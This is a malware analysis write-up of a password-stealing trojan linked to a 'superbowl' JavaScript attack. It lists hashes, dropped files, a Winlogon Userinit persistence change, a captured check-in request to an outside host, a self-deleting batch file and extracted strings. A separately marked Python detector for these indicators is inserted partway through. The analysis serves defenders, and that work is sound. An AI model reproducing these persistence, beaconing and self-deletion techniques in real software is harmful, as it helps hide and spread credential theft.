SuperBowl Attack

This is a partial analysis of the file involved in the malicious "superbowl" JavaScript. I'll be adding more to this soon. Sorry it's a little late.

V.

I highly recommend you read this: http://www.websense.com/securitylabs/blog/blog.php?BlogID=108 and http://www.websense.com/securitylabs/alerts/alert.php?AlertID=733 for more information.
==========================================
OC DATA
==========================================

MD5: ad3da9674080a9edbf9e084c10e80516
SHA-1: 7f1f29fca5022f466bc466caf808f3620ad5b4a7
SHA-256: f4368a714cf16b011c577802d374e1b96a837aee00df0b4d3e0a22f278630341
Filetype: PE executable for MS Windows (GUI) Intel 80386 32-bit
Packer: No packer detected
Kaspersky:
ClamAV:
Antivir:
F-Prot:
Bit Defender: Trojan.PWS.WOW.CN

Original file name = w1c.exe

==========================================
FILES CREATED
==========================================

w1c.exe:1720 CREATE C:\DOCUME~1\macdaddy\LOCALS~1\Temp\~DF587E.tmp
3.exe:1504 CREATE C:\DOCUME~1\macdaddy\LOCALS~1\Temp\~DF5D1D.tmp
1.exe:1612 CREATE C:\DOCUME~1\macdaddy\LOCALS~1\Temp\~DF5E89.tmp
1.exe:1612 CREATE C:\WINDOWS\System32\msmsgs.exe
msmsgs.exe:1904 CREATE C:\DOCUME~1\macdaddy\LOCALS~1\Temp\~DF6011.tmp
ADupdate.exe:472 CREATE C:\DOCUME~1\macdaddy\LOCALS~1\Temp\~DF63B1.tmp
ADupdate.exe:472 CREATE C:\Documents and Settings\macdaddy\Desktop\a.bat
w1c.exe:1720 CREATE C:\DOCUME~1\macdaddy\Desktop\c.bat
3.exe:1504 CREATE C:\DOCUME~1\macdaddy\Desktop\bxe3.bat
1.exe:1612 CREATE C:\DOCUME~1\macdaddy\Desktop\bxe.bat

==========================================
REGISTRY VALUES SET
==========================================

1.exe:1612 SetValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit SUCCESS "C:\WINDOWS\System32\userinit.exe,msmsgs.exe"
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal SUCCESS "C:\Documents and Settings\macdaddy\My Documents"
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e2fa2820-3cac-11da-84a5-806d6172696f}\BaseClass SUCCESS "Drive"
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c9e3a8c3-3cad-11da-8f2a-806d6172696f}\BaseClass SUCCESS "Drive"
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c9e3a8c2-3cad-11da-8f2a-806d6172696f}\BaseClass SUCCESS "Drive"
ADupdate.exe:472 SetValue HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Documents SUCCESS "C:\Documents and Settings\All Users\Documents"
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop SUCCESS "C:\Documents and Settings\macdaddy\Desktop"
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass SUCCESS 0x1
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName SUCCESS 0x1
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet SUCCESS 0x1
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache SUCCESS "C:\Documents and Settings\macdaddy\Local Settings\Temporary Internet Files"
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies SUCCESS "C:\Documents and Settings\macdaddy\Cookies"
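A defender-side check over the file and registry events above, added here as an example and not part of the original post: it parses lines in the monitor's own "process:pid OPERATION ..." form, flags the Winlogon\Userinit tampering and the executable written into System32, and runs on sample lines copied from the two sections above (the detection logic is my own, not the author's).

```python
import re

# Constructed sample: four lines copied from the monitor output above.
SAMPLE_LOG = r"""
1.exe:1612 CREATE C:\WINDOWS\System32\msmsgs.exe
w1c.exe:1720 CREATE C:\DOCUME~1\macdaddy\Desktop\c.bat
1.exe:1612 SetValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit SUCCESS "C:\WINDOWS\System32\userinit.exe,msmsgs.exe"
ADupdate.exe:472 SetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop SUCCESS "C:\Documents and Settings\macdaddy\Desktop"
"""

EVENT_RE = re.compile(r"^(?P<proc>\S+):(?P<pid>\d+)\s+(?P<op>\w+)\s+(?P<rest>.*)$")

def parse_events(log):
    """Split monitor lines into dicts; SetValue lines get key/value, others a path."""
    events = []
    for line in log.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        if ev["op"] == "SetValue" and " SUCCESS " in ev["rest"]:
            key, _, value = ev["rest"].partition(" SUCCESS ")
            ev["key"], ev["value"] = key, value.strip().strip('"')
        else:
            ev["path"] = ev["rest"]
        events.append(ev)
    return events

def userinit_extras(value):
    """Entries in a Winlogon\\Userinit value other than userinit.exe itself. A clean
    value is one userinit.exe path plus a trailing comma; anything else runs at logon."""
    entries = [e.strip() for e in value.split(",") if e.strip()]
    return [e for e in entries if e.rsplit("\\", 1)[-1].lower() != "userinit.exe"]

def find_indicators(events):
    """Flag Userinit tampering and executables written into System32."""
    findings = []
    for ev in events:
        who = f"{ev['proc']}:{ev['pid']}"
        if ev["op"] == "SetValue" and ev.get("key", "").lower().endswith("\\winlogon\\userinit"):
            for extra in userinit_extras(ev["value"]):
                findings.append(f"{who} added {extra} to Userinit (started at every logon)")
        elif ev["op"] == "CREATE":
            p = ev["path"].lower()
            if p.startswith("c:\\windows\\system32\\") and p.endswith(".exe"):
                findings.append(f"{who} dropped executable {ev['path']} into System32")
    return findings
```

On a live system the same `userinit_extras` check applies to the value read from HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit; the real Windows Messenger msmsgs.exe does not live in System32.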

==========================================
REGISTRY KEYS CREATED
==========================================
ADupdate.exe:472 CreateKey HKLM\SOFTWARE\Microsoft\Cryptography\RNG SUCCESS Access: 0x2
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders SUCCESS Access: 0x2000000
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders SUCCESS Access: 0x2000000
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e2fa2820-3cac-11da-84a5-806d6172696f}\
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c9e3a8c3-3cad-11da-8f2a-806d6172696f}\
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c9e3a8c2-3cad-11da-8f2a-806d6172696f}\
ADupdate.exe:472 CreateKey HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders SUCCESS Access: 0x2000000
ADupdate.exe:472 CreateKey HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders SUCCESS Access: 0x2000000
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders SUCCESS Access: 0x2000000
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders SUCCESS Access: 0x2000000
ADupdate.exe:472 QueryValue HKLM\SOFTWARE\Microsoft\OLE\MinimumFreeMemPercentageToCreateProcess NOT FOUND
ADupdate.exe:472 QueryValue HKLM\SOFTWARE\Microsoft\OLE\MinimumFreeMemPercentageToCreateObject NOT FOUND
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders SUCCESS Access: 0x2000
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders SUCCESS Access: 0x2000000
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders SUCCESS Access: 0x2000
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders SUCCESS Access: 0x2000000
ADupdate.exe:472 CreateKey HKCU\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing SUCCES

==========================================
A PACKET I THINK IS RELATED
==========================================

GET /tj/mail.asp?mac=-118767649&ver=0001&st=Windows%20XP HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322)
Host: www.dv521.com
Connection: Close
HTTP/1.1 302 Found

==========================================
SOME PE FILE INFO
==========================================

Imports:

[KERNEL32.DLL]
0x0 LoadLibraryA
0x0 GetProcAddress
0x0 VirtualProtect
0x0 VirtualAlloc
0x0 VirtualFree
0x0 ExitProcess
[MSVBVM60.DLL]
0x0 MethCallEngine

Dependencies:

KERNEL32.DLL
MSVBVM60.DLL

Sections:

.jcoz0

==========================================
SOURCE OF ONE OF THE BATCH FILES
==========================================
c.bat

@echo off
: selfkill
attrib -a -r -s -h C:\DOCUME~1\macdaddy\Desktop\w1c.exe
del C:\DOCUME~1\macdaddy\Desktop\w1c.exe
if exist C:\DOCUME~1\macdaddy\Desktop\w1c.exe goto selfkill
del C:\DOCUME~1\macdaddy\Desktop\c.bat
exit

==========================================
STRINGS FROM c:\windows\system32\msmsgs.exe
==========================================

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
This program cannot be run in DOS mode.
_aspersky AntiVirus
Kaspersky AntiVirus
3qC\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
Windows Messenger
pply to all
echo off
if exist
insert OK
update OK
Windows 2003
Windows XP
Windows Mellinnium
Windows NT 3.51
Windows NT 4.0
Windows 200
Kaspersky Lab
Kaspersky Anti
----------------
ExitProcess
VirtualFree
VirtualAlloc
VirtualProtect
GetProcAddress
LoadLibraryA
advapi32.dll
OriginalFilename
InternalName
ProductVersion
FileVersion
Virus
ProductName
is registered trademark of Kaspersky Lab.
Virus
Anti
Kaspersky
LegalTrademarks
LegalCopyright
CompanyName
StringFileInfo
Translation
VarFileInfo
text
.data
.text
__vbaFreeStr
__vbaFreeObj
__vbaRecAssign
__vbaVarForNext
__vbaAryUnlock
_allmul
__vbaStrMove
_CIatan
__vbaRecDestructAnsi
__vbaVarCopy
__vbaVarDup
__vbaStrToAnsi
__vbaAryLock
__vbaVarAdd
__vbaVarCmpEq
__vbaVarTstNe
_adj_fdiv_r
_adj_fdivr_m32
__vbaDerefAry1
__vbaFreeStrList
__vbaStrCopy
_adj_fdivr_m32i
_adj_fdiv_m32i
__vbaVar2Vec
__vbaInStr
__vbaNew2
__vbaFileOpen
__vbaErrorOverflow
__vbaVarCat
__vbaStrVarVal
__vbaGetOwner3
__vbaUbound
__vbaFPException
__vbaVarCmpLe
_adj_fdivr_m64
_adj_fprem
__vbaPrintFile
__vbaStrToUnicode
__vbaExceptHandler
EVENT_SINK_QueryInterface
__vbaVarAnd
EVENT_SINK_Release
__vbaRecUniToAnsi
__vbaRedim
__vbaFixstrConstruct
_adj_fpatan
__vbaVarOr
DllFunctionCall
__vbaVarTstEq
__vbaStrCmp
EVENT_SINK_AddRef
__vbaFileClose
__vbaChkstk
__vbaVarTstLt
__vbaBoolVarNull
_adj_fdivr_m16i
__vbaObjSetAddref
_adj_fdiv_m16i
__vbaObjSet
__vbaOnError
__vbaVarForInit
__vbaExitProc
__vbaAryDestruct
__vbaVarCmpGe
_adj_fdiv_m32
__vbaLenVar
__vbaLenBstrB
__vbaHresultCheckObj
__vbaSetSystemError
__vbaRecDestruct
__vbaLsetFixstr
__vbaStrCat
__vbaVarCmpNe
__vbaRecAnsiToUni
_adj_fprem1
__vbaFreeObjList
_adj_fdiv_m64
__vbaEnd
__vbaFreeVarList
__vbaStrVarMove
__vbaLenBstr
__vbaAryMove
__vbaFreeVar
__vbaVarVargNofree
__vbaVarMove
_adj_fptan
__vbaVarSub
OpenProcessToken
LookupPrivilegeValueA
AdjustTokenPrivileges
WaitForSingleObject
CreateToolhelp32Snapshot
Process32First
lstrcmpiA
DeviceIoControl
CreateFileA
GetVersionExA
VirtualFree
ReadProcessMemory
VirtualAlloc
VirtualFreeEx
GetExitCodeThread
Process32Next
CreateRemoteThread
GetProcAddress
GetModuleHandleA
WriteProcessMemory
GetLastError
VirtualAllocEx
OpenProcess
GetCurrentProcess
CloseHandle
GetProcAddress
LoadLibraryA
\\.\PhysicalDrive0
ContentLength
WSACleanup
closesocket
recv
send
connect
socket
htons
WSAGetLastError
gethostbyname
gethostbyaddr
inet_addr
WSAStartup
GetLastError
CloseHandle
WriteFile
CreateFileA
FreeLibrary
SeDebugPrivilege
p_Message
strFileName
Timer1
Timer2
Timer3
Timer4
__vbaExitProc
__vbaRecUniToAnsi
__vbaRecAnsiToUni
__vbaRecDestructAnsi
Failed
__vbaUbound
Close
Connection
Host
Maxthon
Windows NT 5.1
compatible
Mozilla/4.0
Agent
User
Language
Accept
Accept
\url.tmp
__vbaOnError
__vbaVarMove
__vbaRecDestruct
__vbaHresultCheckObj
__vbaFreeVar
__vbaStrToAnsi
__vbaGetOwner3
__vbaStrVarVal
__vbaSetSystemError
__vbaVarCopy
__vbaFreeStrList
__vbaStrCopy
__vbaRecAssign
__vbaVarAnd
__vbaVarCmpEq
__vbaNew2
__vbaFreeObjList
__vbaFreeVarList
__vbaObjSet
__vbaVarTstEq
__vbaVarOr
__vbaVarCmpNe
__vbaStrCmp
__vbaStrMove
__vbaBoolVarNull
__vbaFreeObj
__vbaStrCat
__vbaFreeStr
__vbaObjSetAddref
__vbaVarTstNe
__vbaErrorOverflow
__vbaFixstrConstruct
__vbaLsetFixstr
__vbaStrToUnicode
__vbaEnd
__vbaInStr
__vbaVarForInit
__vbaLenBstr
__vbaStrVarMove
__vbaVarForNext
__vbaFileOpen
__vbaPrintFile
__vbaFileClose
__vbaRedim
__vbaLenVar
__vbaVarVargNofree
__vbaVarSub
__vbaVarAdd
__vbaVarTstLt
__vbaVarCmpGe
__vbaVarCmpLe
__vbaDerefAry1
__vbaVarCat
__vbaVarDup
__vbaAryMove
__vbaVar2Vec
__vbaAryLock
__vbaAryUnlock
__vbaLenBstrB
__vbaAryDestruct
\tmpad.log
Explorer.exe
iexplore.exe
bxe3.bat
\bxe3.bat
bxe.bat
exit
goto selfkill
attrib
selfkill
\bxe.bat
Skip
lete
Disinfect
AVP.ExclusionEdit
AVP.ADetectionDialog
AVP.Product_Notification
AVP.AlertDialog
\userinit.exe,msmsgs.exe
Userinit
RegDeleteValueA
RegDeleteKeyA
RegCreateKeyA
RegCloseKey
RegQueryValueExA
RegQueryValueA
RegSetValueExA
RegSetValueA
RegOpenKeyExA
RegOpenKeyA
advapi32.dll
ADupdate
\msmsgs.exe
msmsgs.exe
.exe
//ww.dv521.com/tj/mail.asp
DeleteFileAD
CloseHandleD
GetSystemDirectoryAD
GetVolumeInformationA
GetVersionExA
SystemDirectory
EscapeCode
SelfDel
GetShortPath
fDelInvaildChr
autoRun
whereAmI
GetShortPathNameA
mouse_event
GetWindowRect
SetCursorPos
Sleep
SendMessageA
FindWindowExA
FindWindowA
GetWindow
GetClassNameA
GetWindowTextA
Timer3
Form
Timer4
Timer2
Timer1
kisv
Module3
Module2
Module1

==========================================
STRINGS FROM w1c.exe
==========================================

This program cannot be run in DOS mode.
3qC\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
echo off
if exist
This program cannot be run in DOS mode.
_aspersky AntiVirus
Kaspersky Lab
Kaspersky Anti
This program cannot be run in DOS mode.
Microsoft Corporation
----------------
.bpu
MethCallEngine
ExitProcess
VirtualFree
VirtualAlloc
VirtualProtect
GetProcAddress
LoadLibraryA
install.exe
OriginalFilename
install
InternalName
ProductVersion
FileVersion
ProductName
woow
CompanyName
StringFileInfo
Translation
VarFileInfo
AdjustTokenPrivileges
__vbaVarTstGt
ExitProcess
VirtualFree
VirtualAlloc
VirtualProtect
GetProcAddress
LoadLibraryA
WindowsUpdata.exe
OriginalFilename
WindowsUpdata
InternalName
ProductVersion
FileVersion
Operating System
Windows
Microsoft
ProductName
CompanyName
StringFileInfo
Translation
VarFileInfo
advapi32.dll
kernel32.dll
Richf
OpenProcessToken
ExitProcess
VirtualFree
VirtualAlloc
VirtualProtect
GetProcAddress
LoadLibraryA
advapi32.dll
OriginalFilename
InternalName
ProductVersion
FileVersion
Virus
ProductName
is registered trademark of Kaspersky Lab.
Virus
Anti
Kaspersky
LegalTrademarks
LegalCopyright
CompanyName
StringFileInfo
Translation
VarFileInfo
autoRun
Rich
EVENT_SINK_QueryInterface__vbaExceptHandler
EVENT_SINK_AddRefDllFunctionCallEVENT_SINK_ReleaseX
MethCallEngine
strFileNamea
exit
goto selfkill
attrib
selfkill
\c.bat
.exe
\ADupdate.exe
fDelInvaildChr
LowByte
HiByte
GetShortPath
SelfDel
GetShortPathNameA
Form
install
install.exe
OriginalFilename
install
InternalName
ProductVersion
FileVersion
ProductName
woow
CompanyName
StringFileInfo
Translation
VarFileInfo
.jcoz2
.jcoz1
.jcoz0